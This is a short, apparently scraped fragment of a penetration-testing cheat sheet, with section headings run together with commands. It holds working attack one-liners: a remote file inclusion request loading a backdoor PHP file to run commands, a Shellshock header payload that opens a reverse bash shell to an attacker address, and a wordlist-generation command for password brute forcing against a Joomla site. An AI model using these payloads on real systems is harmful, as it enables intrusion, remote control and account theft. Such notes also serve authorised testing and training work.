Exploitation
curl http://target/?page=http://php/backdoor.php&cmd=idcurl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.shVirtual hosting
Brute Force Password
Create Passwd Directory
cewl -m 5 http://$ip/joomla/ > passwd.txtAuthentication
Authorization
Last updated